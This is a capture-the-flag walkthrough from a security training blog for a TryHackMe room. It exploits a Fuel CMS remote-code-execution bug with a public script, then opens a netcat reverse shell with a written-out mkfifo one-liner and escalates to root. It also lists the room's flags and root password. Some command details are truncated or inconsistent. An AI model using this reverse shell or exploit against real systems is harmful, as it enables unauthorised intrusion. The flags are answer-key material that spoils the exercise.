Preaload Image
Back
CTF Walkthrough Solution | Cyber Security - Secuneus Tech

Secuneus Labs – TryHackMe Walk-through : Priv CTF22

Walkthrough : Priv Ctf22

Secuneus Room : TryHackme

Join Room : https://tryhackme.com/jr/secuneusctf

1. Firstly we will scan the IP address  using Nmap which tell us that port 80 is Open.

2. Then we will visit the website running on the IP address, on the IP address there a website is running named as Fuel CMS. 

3. So we search about the Fuel CMD.

4. After searching we find that the Fuel CMS is vulnerable to a remote code execution using a python file 47138.py which is available  in the Linux.

5. Then we start editing the file in which e change  the IP Address to our target IP.

6. After editing the file we can run it using the command “python2.7 47138.py”. It will not run in python3.

7. It will give us a CMD of the application.

8. Then we will use netcat to get the shell access.

9. We use netcat reverse shell command line from http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet.

rm /tmp/f ; mkfifo /tmp/f ; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.47.96 4444 >/tmp/

twseptian@twsterlab ~ 

╰─$ nc -lvnp 4444

Ncat: Version 7.80 ( https://nmap.org/ncat )

Ncat: Listening on :::4444

Ncat: Listening on 0.0.0.0:4444

Ncat: Connection from 10.10.47.96.

Ncat: Connection from 10.10.47.96 :47538.

/bin/sh: 0: can’t access tty; job control turned off

$ id

uid=33(www-data) gid=33(www-data) groups=33(www-data)

$ whoami

www-data

$ /usr/bin/script -qc /bin/shell /dev/null  

www-data@ubuntu:/var/www/html$ 

10. This will give us the shell access.

11. Now we will search for the first flag in the normal user.

12. In the normal user there is a directory root which contain the file flag.txt which have  the first  flag which is: 6470e394cbf6dab6a91682cc8585059b

13. After this we have to install database in it as it was written on the website.

14. After installing the database we will find the root password which is mememe.

15. The we will be the root user and search for the root.txt file which contain the second flag which is: b9bbcb33e11b80be759c4e844862482d.

Tag:, , ,

Secuneus Tech

You may also like

Secuneus Labs – TryHackMe Walk-through : Misdirection 1
December 9, 2023

Penetration Testing Methodologies Network Scan Enumeration Exploit Privilege Escalation Walkthrough Step 1 : Run Netdiscover tool to check all the devices connected on the same network from where you can get the IP of the target.The IP found here is …

Secuneus Labs – TryHackMe Walk-through : THE MATRIX 2
December 9, 2023

Step 1 command = netdiscover -r 192.168.1.0/24 Use this to find all the ip/hosts near you. Here the ip of target machine is 192.168.1.41 Step 2 Use command = nmap -A -sV -p- 192.168.1.41 for aggressive scan Step 3 following …

Secuneus TryHackme Walkthrough : MyFileServer 2
December 9, 2023

Penetration Testing Methodologies Network Scan ·        Netdiscover ·        Nmap Enumeration ·        Nikto ·        Telnet ·        Smbmap Exploit Privilege Escalation Walkthrough Step 1: Run Netdiscover tool …